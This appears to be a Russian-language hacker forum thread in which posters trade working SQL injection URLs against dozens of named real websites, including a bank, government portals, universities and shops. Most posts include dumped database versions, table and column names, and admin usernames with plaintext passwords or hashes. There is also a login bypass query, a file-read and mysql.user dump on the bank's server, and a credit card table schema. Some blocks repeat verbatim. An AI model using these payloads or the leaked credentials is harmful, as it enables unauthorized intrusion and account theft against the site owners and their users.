MySQL Error: 1267 (Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION')
Session halted.

Официальный сайт НЗШВ
http://www.nzshv.ru/interview.php?id=-1+union+select+1,2,3,4,5,6,7,8/*

Вот так

http://www.nzshv.ru/interview.php?id=-1+union+select+1,2,convert(concat(version(),0x3a,d atabase(),0x3a,user())+using+cp1251),4,5,6,7,8/*

Официальный сайт клуба "Бодрость"
http://www.bodrost.h1.ru/results.php?id=-1+union+select+1,concat_ws(0x3a,user(),version(),d atabase()),3,4,5,6/*
bodrost6@172.16.1.3
4.0.18
p.s: я не стал подбирать таблици, т.к. сайт сильно тормозит =(

nvsaratov.ru - газета "Новые Времена"
случайно наткнулся на сей сайт...
http://nvsaratov.ru/default.php?go=show&id=4887&paper_id=1'+union+select+1,2,3,4,version(),6,user( ),8,9,10,11/*4.1.22-log nvsaratov@hosting.overta.ru
думал се... а нет. тыкнув кавычкой в админке вылезла ошибка: Ошибка в запросе: SELECT id, ip, login, pass, name, email FROM __admin WHERE LOWER(login)=LOWER('' or 1=1/*') AND ((pass='21232f297a57a5a743894a0e4a801fc3' AND is_encoded=1) OR (pass='admin' AND is_encoded=0)) LIMIT 1 из которой сразу видны таблица и колонки =)
http://nvsaratov.ru/default.php?go=show&id=4887&paper_id=1'+union+select+1,2,3,4,concat(login,char (58),pass,char(58),email,char(58),name),6,7,8,9,10 ,11+from+__admin/*webmaster:824dbff1455fe6ed2d753200a889fbb1:nv.sar atov@overta.ru:Новые времена
admin:0b944a04224b108c29b460245a13664e:design@over ta:Администратор
собсно расшифровывать пароли мы не будем... а исходя из вышеупомянутой ошибки, составим запрос =) 0b944a04224b108c29b460245a13664e' AND is_encoded=1) OR (pass='12345' AND is_encoded=0)) LIMIT 1/* куда его вставлять додумывайте сами... вуаля мы в админке =) п.с. информация о уязвимости была отправлена

БД 4...перебором нашёл мемберов
http://www.gilbo.ru/index.php?page=liderlist&art=-1255'+UNION+SELECT+1,2,concat(nick,0x3a,pass),4,5, 6,7+FROM+members+limit+1,1/*
Админка
http://www.gilbo.ru/admin.php

EEстонский JaZZ
www.jazzkaar.ee
http://www.jazzkaar.ee/eng/news.php?id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(version() ,0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27+from+users+--+4.1.13-Debian_0.dotdeb.0-log
http://www.jazzkaar.ee/eng/news.php?id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat_ws (0x3a,username,password),0x71),0x71),3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2 6,27+from+users+limit+0,1+--+
Есч0 и сбрутил =)
testuser:179ad45c6ce2cb97cf1029e212046e81:testpass
kasutaja:878e9103c2f839fab4027a12b1b33e8c:kasutaja Идем дальше..

ПОЗОР ДНЯ

Корпорация ЮНИ

Специализация: Информационные технологии и Информационная Безопасность.

www.uni.ru
http://www.uni.ru/news.php?action=show_event&id=-1+union+select+1,2,3,4,5,6,7,8,9,version(),11,12+--+
5.0.26-standard-log
Табла users.
Столбцы:
uid
user
password
http://www.uni.ru/news.php?action=show_event&id=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,ui d,user,password),11,12+from+itg.users+--+
2:itg:zQ34hPx9

Дальше..

ONLINE JOBS
www.onlinejobs.ru
http://onlinejobs.ru/comment.php?ID=-1+union+select+1,version(),3,4,5+--+5.0.22
Удобный вывод всех таблиц.
http://onlinejobs.ru/comment.php?ID=-1+union+select+1,table_name,3,4,5+from+information _schema.tables+--+
Интересные:
admins
adminip
users
http://onlinejobs.ru/comment.php?ID=-1+union+select+1,concat_ws(0x3a,id,name,pass,mail, admins),3,4,5+from+jobsmarket_job.admins+--+
1:adminyu:1q2wasdfre:donguan@bk.ru:0

Рейтинг серверов Linage II

http://top.l2info.net/index.php?go=in&id=279 and 1=2 union select 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21 from information_schema.tables/*

EEстонский JaZZ
www.jazzkaar.ee
http://www.jazzkaar.ee/eng/news.php?id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(version() ,0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27+from+users+--+4.1.13-Debian_0.dotdeb.0-log
http://www.jazzkaar.ee/eng/news.php?id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat_ws (0x3a,username,password),0x71),0x71),3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2 6,27+from+users+limit+0,1+--+
Есч0 и сбрутил =)
testuser:179ad45c6ce2cb97cf1029e212046e81:testpass
kasutaja:878e9103c2f839fab4027a12b1b33e8c:kasutaja Идем дальше..

ПОЗОР ДНЯ

Корпорация ЮНИ

Специализация: Информационные технологии и Информационная Безопасность.

www.uni.ru
http://www.uni.ru/news.php?action=show_event&id=-1+union+select+1,2,3,4,5,6,7,8,9,version(),11,12+--+
5.0.26-standard-log
Табла users.
Столбцы:
uid
user
password
http://www.uni.ru/news.php?action=show_event&id=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,ui d,user,password),11,12+from+itg.users+--+
2:itg:zQ34hPx9

Дальше..

ONLINE JOBS
www.onlinejobs.ru
http://onlinejobs.ru/comment.php?ID=-1+union+select+1,version(),3,4,5+--+5.0.22
Удобный вывод всех таблиц.
http://onlinejobs.ru/comment.php?ID=-1+union+select+1,table_name,3,4,5+from+information _schema.tables+--+
Интересные:
admins
adminip
users
http://onlinejobs.ru/comment.php?ID=-1+union+select+1,concat_ws(0x3a,id,name,pass,mail, admins),3,4,5+from+jobsmarket_job.admins+--+
1:adminyu:1q2wasdfre:donguan@bk.ru:0
http://onlinejobs.ru:2222/CMD_LOGIN - админка, но пароль не подошел :(

http://www.cyberbrest.com/index.php?page=files&id=-1+union+select+1,2,3,4,5,concat_ws(char(0x20,0x3a, 0x20),login,password,email),7+from+user/*

www.abruzzoverdeblu.it
http://www.abruzzoverdeblu.it/?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,database() ,0x3a,user(),0x3a,version(),0x3a),7,concat(usernam e,0x3a,password),9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23+from+abruzzov_db.utenti/*
Расскрутил до конца!!!
admin : bluver02
а админку не нашёл =)))
abruzzov_user1@localhost
5.0.45-community
abruzzov_db

http://www.phuket-estate.com/search.php?hot=999999'

http://www.phuket-estate.com/search.php?hot=999999'+union+select+0,1,2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,convert(concat (USER(),char(58),VERSION())+using+latin1),21,22,23 ,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,4 0,41,42,43,44,45,46,47,48,convert(concat(DATABASE( ),char(58))+using+latin1),50,51,52,53,54,55,56,57, 58,59,60,61,62,63,64,65,66,67,68,69/*

70 столбцов...
USER:jeab690_10@216.92.127.221
DATABASE:jeab690_AMRE
VERSION:4.1.14-log

http://www.dizelist.ru/index.php?id=-7+union+select+1,version(),concat_ws(0x2F,id,name, password),4,5,6,7+from+ds_dizelist_users/*

Version : 5.0.45-log/u59144@10.10.10.202/u59144

Admins:

Id / Name / Password

1/Dizelist.RU/Administrator123
2/Тарас/tarikpassword
3/VE/9505111
4/dizel/9112014
5/Nicolay/456123
6/Юрий/30055691

http://www.eduvluki.ru

http://www.eduvluki.ru/metod/level2.php?id=-178+union+select+concat_ws(0x3a,user_login,user_pa sswd)+from+arc_users/*

Админка
http://www.eduvluki.ru/admin/

Эх, Италия ...

pigot4.ithttp://www.pigot4.it/testi-canzoni-gratis/cantanti.php?cantante=-1+union+select+1,concat_ws(0x3a,version(),database (),user())/* 4.1.19-community-nt:testicanzoniit154:WA_012988@localhost

Админ [ логин : пасс ]:Pigot4 : LmrscA90t------------------------------------------------------------------------

Powered by: Cowgar Racing's Apache Portal. It's CRAP!!! - gameрские сайты

Примеры:

[1.] fierojoe.com :http://www.fierojoe.com/index.php?func=plugins&p=classifieds&go=item_details&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,concat_ws(0x3a,version(),database(%20%20%20),u ser())/* 5.0.42-log:fierojoe_new:fierojoe@localhost

116 таблиц:http://www.fierojoe.com/index.php?func=plugins&p=classifieds&go=item_details&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,table_name+from+information_schema.tables+limi t+115,1/*
Наши табы и нужные акки в них:crap_email_list
crap_host_users fierojoe : fe565f575eebcc06e65b5cc51667c368 [ fierogt ]
crap_users admin : 87ee82c2af7fbd7ecf7bcd7b73b4afb1
j_users fierojoe : fierogt[2.] ricewarsthegame.comhttp://www.ricewarsthegame.com/index.php?func=plugins&p=links&go=sub_list&cat_id=-1+union+select+1,concat_ws(0x3a,version(),database (%20%20%20),user())/* 5.0.42-log:ricewars:ricewars@localhost

63 таблицы:http://www.ricewarsthegame.com/index.php?func=plugins&p=links&go=sub_list&cat_id=-1+union+select+1,table_name+from+information_schem a.tables+limit+63,1/* Нам нужна таба mantis_user_table

Сайт группы: _http://crap.cowgarracing.com/index.php
Админский акк вероятно:admin : 87ee82c2af7fbd7ecf7bcd7b73b4afb1------------------------------------------------------------------------

gov

radom.rdlp.gov.plhttp://www.radom.rdlp.gov.pl/index.php?id=10&a=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7/* 5.0.32-Debian_7etch1-log:rdlp_radom_pl:rdlpradom@localhost

Админ [ логин : пасс ] :paneLBiP : panelbIp, но админку не нашёл :mad:

http://www.alliancepermanentaccess.eu/index.php?id=-1+union+select+1,id,username,password,5,6,7+from+u sers+limit+3,2/*

database: alliancepermanentaccess

user: alliancepa@kb.edu

version: 5.0.22-community-nt

в базе всего 4 пользователя:

1)login:Hans Jansen
password:jansen

2)login:Ingrid Dillo
password:dillo

3)login:Bert Bulder
password:bulder

4)login:KirstenvH (может добавлять и редактировать новости)
password:hulsen

www.totalgameplay.com
http://www.totalgameplay.com/news.php?id=-1+union+select+1,2,3,version(),5,user(),7,8,databa se(),10,11/*
4.1.22-standard-log

tgp_sysclie@localhost

tgp_gamedb
_______________________________________

При запросе http://www.totalgameplay.com/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat(table_schema ,0x3a,table_name),10,11+from+information_schema.co lumns+where+column_name=0x70617373776F7264/*
Получается SELECT command denied to user 'tgp_sysclie'@'localhost' for table 'columns'
Попробуйте ктонибудь дораскрутить...

www.kursor-trans.com
http://www.kursor-trans.com/news.php?id=-1+union+select+1,2,user(),version()/*
4.1.22-standard

kursor_alex@localhost

Bank Of Baku
http://www.bankofbaku.com/rus/news.php?id=-15'+union+select+1,2,load_file('/tmp/123.php'),4,5,6,7,8,9,10,11,12,13,14,15/*

http://trizland.ru/task.php?id=9999

http://trizland.ru/task.php?id=9999+union+select+0,1,concat(USER(),0x 3a,VERSION(),0x3a,DATABASE(),0x3a),3,4,5,6,7,8/*

USER:bin17www-sql@way.hc.ru
VERSION:4.1.18
DATABASE:bin17www

www.crim.ncsu.edu/

http://www.crim.ncsu.edu/project_detailed.php?id=-1+union+select+1,2,3,concat(user_login,0x3a,user_p ass),5,6,7,8,9,1,2,3,4,5,6,7,8+from+wp_users+limit +0,1/*

admin:75bb40f591c0db371aba50f65741d73f

Bank Of Baku

Немнога доработал

http://www.bankofbaku.com/rus/news.php?id=-15'+union+select+1,2,load_file('/tmp/123.php'),4,5,6,7,8,9,10,11,12,13,14,concat_ws(0x2 F,user,password)+from+mysql.user/*

admins

root/60f57c4813f45b5f
orxanx/3d43b7262348c8c8

http://www.seacoastrugby.org/news.php?id=-123+union+select+1,2,concat_ws(char(58,58),user(), database(),version()),4/*
rugby@localhost::seacoast::5.0.27
http://www.seacoastrugby.org/news.php?id=-123+union+select+1,2,concat_ws(char(58,58),usernam e,email,password),4+from+mos_users/*
admin::hostmaster@me-and-e.com::f749b2d0d046218a980aa301950d6aa7

http://socstudikantiani.fls.unipi.it/index.php?id=-1+union+select+1,2,3,user(),5,version(),7,8,9,10/*
http://rba-optima.com/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
Object Moved
Что за??
http://www.dualtime.ru/category.php?id=-1+union+select+1,2,3/*
и
http://www.mywatches.ru/category.php?id=-1+union+select+1,2,3/*
и
http://www.atlantic-time.ru/category.php?id=-1+union+select+1,2,3/*
что за?
________________________________________

www.korsteklobor.ru

http://www.korsteklobor.ru/category.php?id=-1+union+select+1,concat(login,0x3a,password),3+fro m+user/*
тут всё сделал =)
логин: korsteklobor
пасс: krstklbr

МАКС

http://www.aviasalon.com

SQL-инъекция содержится в форме поиска

http://www.aviasalon.com/search.php?search_string=mig29"

Двойная кавычка вызывает ошибку в SQL-запросе, что даёт возможность узнать установочный путь скрипта

/home/aviasalon.com/data/htdocs/modules/mod_search.php ,

а также увидеть текст нескольких SQL-запросов. Так, можно получить информацию об именах некоторых таблиц и их полях.

Таблица______________Поля

engine_page: id,title,menu_id,content,keywords,description,stat us
list_param_value: value, item_id
list_item: id, title, alias, type_id
list_type: alias, id, prefix, suffix, title
data_news_item: title, alias, content, anons, topic_id
data_news_topic: alias, id
data_expo_company: title, alias, about, contacts

Запрос с одинарной кавычкой вызовет ошибку в регулярном выражении, раскрыв путь скрипта на сервере (см. выше)
http://www.aviasalon.com/search.php?search_string=mig29'

Для Myke007

Усердней!!!!!!

http://www.totalgameplay.com/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user name,psw),10,11+from+login+limit+0,1/* Поля :username, psw

http://www.futureplay.org/news.php?id=999+union+select+1,login,3,user_passwo rd,5,6,7+from+user/*

Admins Password eMail

dloosemore /e8a59ea2c530174b8f60562d05a4403f /Deborah.Loosemore@algomau.ca
praycroft /b35c7298864f797f41e7b9da8781ed63 /raycroft@algomau.ca
picto_admin /0ef2057aa44ce08666f6a5876bf8da19 /info@pictographics.com

http://www.sthscareers.com/news.php?id=-76+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(conc at_ws(char(58,58),user(),database(),version()),0x7 3),0x73),5,6,7,8,9,10,11,12,13,14,15/*
root@localhost::sths_hr1::4.1.10a


http://www.americanfibersystems.com/news.php?id=-71+union+select+1,2,concat_ws(char(58,58),user(),d atabase(),version()),4,5,6,7,8,9,10,11,12/*
afsnetworks2@localhost::afs_site::4.1.20
http://www.americanfibersystems.com/news.php?id=-71+union+select+1,2,concat_ws(char(58,58),username ,passwd),4,5,6,7,8,9,10,11,12+from+users/*
admin::b6983419181946ae88210bf45a998e5b
abrache@afsnetworks.com::6b340fa679eca67086d97ddbf b9894c3::majerle

http://www.nfb.ca/about/news.php?id=-1585+union+select+1,version(),3,concat_ws(0x2F,log in,pass),5,6,7,8,9,10,11,12,13,14+from+user/*

Version: 5.0.37-log/webadmin@localhost/texte

Admins:
Login Password

florence / *C6E74EDED542939C3FF2F2277CD9EDD14719455A
ryan /*8DC81F46F004E99DD2347305BF897C973FD50956

мозгоёбство:
http://www.batiweb.com/produits/search/rub.asp?type=elements-non-porteurs-verticaux&niv=
1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES+WHERE+TABLE_NAME+
NOT+IN+('dtproperties','annuaire','AWARDS','AWARDS _REF_THEMATIQUES','AWARDS_TRACKING','AWARDS
_VOTE','flash_produit','indus_rub','LOGO_INDUSTRIE LS','LOGO_STATS','LOGOS_TOP','marq_rub','marque','
minisite','PARTNERS','PARTNERS_STATS','prio_marque ','rubrique','RUBRIQUE_TEXTES','sponsorise','stats _url'
,'sysconstraints','syssegments','TEST_URL'))--
стока парица, и нет ничё нормального.

http://www.filmdeculte.com/film/film.php?id=-1978+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24+from+film/*
4-ая ветка =\

http://www.exploresouthbend.org/news.php?id=-96+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat _ws(char(58,58),user(),database(),version()),0x73) ,0x73),4,5/*
tony@seopro.com::livethelegends::4.1.10a-log

http://www.gemeindebund.at/news.php?id=-334+union+select+1,2,3,4,5,concat_ws(char(58,58),u ser(),database(),version()),7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27/*
gemeinde@localhost.localdomain::cad_gemeindebund:: 4.0.24-standard

http://www.tweak.dk/nyheder2.php?id=-15246+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16+from+users/*

http://www.salesafter.de/index.php?id=-30+union+select+1,VERSION(),3,4,5,6,7,8,9,10,11,12 ,13/*

Это мой первый пост так что не судите строго, если что то не так =)

http://www.ugkr.ru/news.asp?id=-842+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19.20,21,22,23--
http://www.ugkr.ru/news.asp?id=-842%20union%20select%201,2,table_name,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19.20,21,22,23%20from%2 0information_schema.tables%20where%20table_name%20 not%20in%20('ABITUR','BIBLIOTEKA')--

Нужная табличка USRGENERAL, а вот список столбцов в ней:
FIRSTLOGON
ID
KEYKOD
KOD_1S
NAME1
NAME2
NAME3
PASKEY
PASSWORD
USER_BIRTH
USER_GENDER
USER_INN
USER_MAIL
USER_PROXCART
USER_RIGHT
USER_SPEC
USER_STUD_STAT_PERIOD
USER_STUD_STATUS
USER_TYPE
USER_UCHGROUP
USER_UDOST
USER_UDOST_DATE
USER_UDOST_NOMER
USER_UDOST_SERIAL

http://www.denicek.altre.cz/coment.php?autors=0&id=78221+UNION+SELECT+1,2,concat_ws(name,0x3a,user name,0x3a,icq,0x3,email),4,5,6,7+from+users/*
не добил - поле пароля ни как не подберу ..
http://www.denicek.altre.cz/admin

не добил - поле пароля ни как не подберу ..
pw

http://www.funisland.com/gamelist.php?id=-13+UNION+SELECT+1,password,username,4,5,6,7,8,9,10 ,11,12,13,14,15+from+admin/*

http://www.recado.ru/index.php?id=9999+union+select+1,2,concat(user,0x3 a,pass)+from+users+limit+0,1/*

http://www.shemaroo.com/online/product.asp?productid=2279'+or+1=(select+top+1+tab le_name+from+information_schema.tables+where+table _name+not+in+('ContestResults','Countries','Curren cy','DetailPoll','Download','download_logins','Dow nloadDetails','Film','HomeImages','Login','dtprope rties','MblCon','MISDNRange','Order_Details','Orde r_Master','Order_DetailsIntl','Order_MasterIntl'))--&sent=1

Tables: 'ContestResults','Countries','Currency','DetailPol l','Download','download_logins','DownloadDetails', 'Film','HomeImages','Login','dtproperties','MblCon ','MISDNRange','Order_Details','Order_Master','Ord er_DetailsIntl','Order_MasterIntl

Columns из "Login":
'KeyID','LastLogDate','LoginId','PassAns','PassQue s','Password','Status'

http://musical-shop.de/details.asp?Artikelnr=10301'+or+1=(select+top+1+ta ble_name+from+information_schema.tables+where+tabl e_name+not+in+('Pages_MusicalShop','sysconstraints ','syssegments','Bewertungen','D99_Tmp','Tab_Artik el','Tab_Artikel_BACKUP','Tab_Musicalnews','Tab_Mu sicalHistory','Tab_MusicalPremieren','Tab_Musicals ','Tab_Musicaltickets','Tab_Playbacks','Tab_Premie ren','Tab_Soundclips','Tab_Soundtracks'))--
Tables: Pages_MusicalShop','sysconstraints','syssegments', 'Bewertungen','D99_Tmp','Tab_Artikel','Tab_Artikel _BACKUP','Tab_Musicalnews','Tab_MusicalHistory','T ab_MusicalPremieren','Tab_Musicals','Tab_Musicalti ckets','Tab_Playbacks','Tab_Premieren','Tab_Soundc lips','Tab_Soundtracks','Werbebanner'

http://www.dvd-shop.ch/result.php?menuid=2'+union+select+1,21,3,table_nam e+from+information_schema.tables+where+table_name+ not+in+('CHARACTER_SETS','COLLATIONS','COLLATION_C HARACTER_SET_APPLICABILITY','COLUMNS','COLUMN_PRIV ILEGES','KEY_COLUMN_USAGE','ROUTINES','SCHEMATA',' SCHEMA_PRIVILEGES','STATISTICS')/*

http://www.artrainusa.org/artwork.asp?item=(select%20top%201%20column_name%2 0from%20information_schema.columns%20where%20table _name='Sales'%20and%20column_name%20not%20in%20('C ustID','OrderID','BName','BCompany','BAddress','BC ity','BState','BZip','BCountry','Name','Company',' Address','City','State','Zip','Country','Phone','E mail','Details','SubTotal','Tax','Shipping','Shipp ingType','GrandTotal','CC','CCNo','CCExp','DatePos ted','isDonation','anonymous','mailinglist','conta ct_preference','contact_idea'))--
Tables:
'News','Calendar','Catalog','dtproperties','Featur es','Sales','sysconstraints'

Columns из 'Sales':
'CustID','OrderID','BName','BCompany','BAddress',' BCity','BState','BZip','BCountry','Name','Company' ,'Address','City','State','Zip','Country','Phone', 'Email','Details','SubTotal','Tax','Shipping','Shi ppingType','GrandTotal','CC','CCNo','CCExp','DateP osted','isDonation','anonymous','mailinglist','con tact_preference','contact_idea'

http://www.acte.org/resources/press_release.php?id=-91+union+select+1,2,3,concat(id,0x3a,login,0x3a,pa ssword),5,6,7,8,9+from+users/*

http://www.dswd.gov.ph/faqdetails.php?id=-47+union+select+1,concat(ID,0x3a,username,0x3a,pas sword),3,4,5,6+from+P_admin/*

http://www.bactravel.it/centri/schede.php?id=-9+union+select+1,VERSION(),3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17/*

Первая инъекция, сильно не ругайте
http://www.malco.com/index.php?page=movie_cinema&movie_id=1993+union+select+database(),2,VERSION(), user(),5,6,7,8,9,10/*

http://www.malco.com/index.php?page=movie_cinema&movie_id=1993+union+select+1,name,3,4,5,6,7,8,9,10 +from+users+where+name=admin/*

Немного доработал, от меня такой вариант:
http://www.malco.com/index.php?page=movie_cinema&movie_id=1993+union+select+concat(name,0x3a,email) ,2,3,4,5,6,7,8,9,10+from+users/*

убийствеенная скуля в mssql(это всё одна скуля) тут выводить не стал, т.к. то что вывел для себя- всеравно не подошло.

http://www.cerclefinance.com/default.asp?pub=valactu&localcode=&isin=&art=1+or+1=(SELECT+TOP+1+TABLE_NAME
+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+N OT+IN+('REFERENTIAL_CONSTRAINTS','ficcf13000EMAILS '
,'Portrait_Type','site','CHECK_CONSTRAINTS','CONST RAINT_TABLE_USAGE','Pays_Calsta','cf_stat_1','CONS TRAINT_COLUMN_USAGE'
,'non_membres'','VIEWS','compteur_connexions',,)'V IEW_TABLE_USAGE','VIEW_COLUMN_USAGE','calendrier_s tat','audit_lignes'
,'Sondage_Trace','dtproperties','valtop','Intervie w','articles','Hard-Bounces','Dossier_Lexique','exception','Interview_ Futur','utilisateur'
,'emailing_tmp','cp_20070426','pays','Dossier','al erte_env','email_env','menu_profil','habilitation_ journaliste','questions','articles_test'
,'newsvaleurlast','envoi','Interview_Type','avis_d es_brokers','type_article','PROFIL','format','menu ','Conseils','desabonne','t_jiaozhu',
'email_SNCF','articles_sauv','Dossier_Theme','ICB' ,'popup','Economic_group','CF_ibase','accnew','tmp email','newsvaleur','stocksname',
'nospam','aide','Dep','membres_relance','emailing_ Effidata','CF_vue_nb_mails','forum2','concours','e nquete','CmdShell','pop_email'
,'seuils_et_resistances','parties_payantes','Dossi ersTMP','calendrier_ste','concours_oct2001_questio ns','eco_group','cookies','Contacts_CP'
,'liens_articles','ENTREPRISE',''Interview_Bio','e mailing_tmp_Himedia','essai','membres_email_faux', 'concours_oct2001_reponses','newshebdo'
,'mailing_cpr','images','initiation','KEY_COLUMN_U SAGE','markviral','CreaFinance_Mails','morning_env ','membres','CONSULTATION_ARTICLE'
,'DateXML5','nokia','membres3','articles_2003','no ms','env_tmp_atos_sg','noms2','Valeur_perso','avis desbrokers','pub','stats','non_membres
_email_faux','concours_oct2001_participants','valt opbs','habilitation','JOUR_FERIE','forum','ibase_2 0070122','Interview_QR','type_xml','FTP_Trace',
'groupe_menu','tmpemail2','nochronique','articles_ 2002','EMail_20060616','fondamentaux','emailing_tm p_ibase','invalides','ficcfp','OST','stat_membres
','secteur','Sondage_Proposition','utilisateurs_cl ick_and_buy','Sondage','syssegments','situation',' sysconstraints','sysalternates','etudes'
,'SCHEMATA','TABLES','membres_v2','TABLE_CONSTRAIN TS','FauxEmails','TABLE_PRIVILEGES','COLUMNS','cen tre','COLUMN_DOMAIN_USAGE'
,'COLUMN_PRIVILEGES','DOMAINS','Portrait','DOMAIN_ CONSTRAINTS','invalides_20071129','recommandations '))--

Для Mike007

Когда начнём стараться?!http://www.dualtime.ru/page.php?n=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4/* 4.0.27:replica_db0:replica_db0@88.214.192.30http://www.mywatches.ru/page.php?n=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4/*5.0.45-log:u80484:u80484@10.10.223.245http://www.atlantic-time.ru/page.php?n=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4/* 5.0.45-log:u48597:u48597@10.10.223.217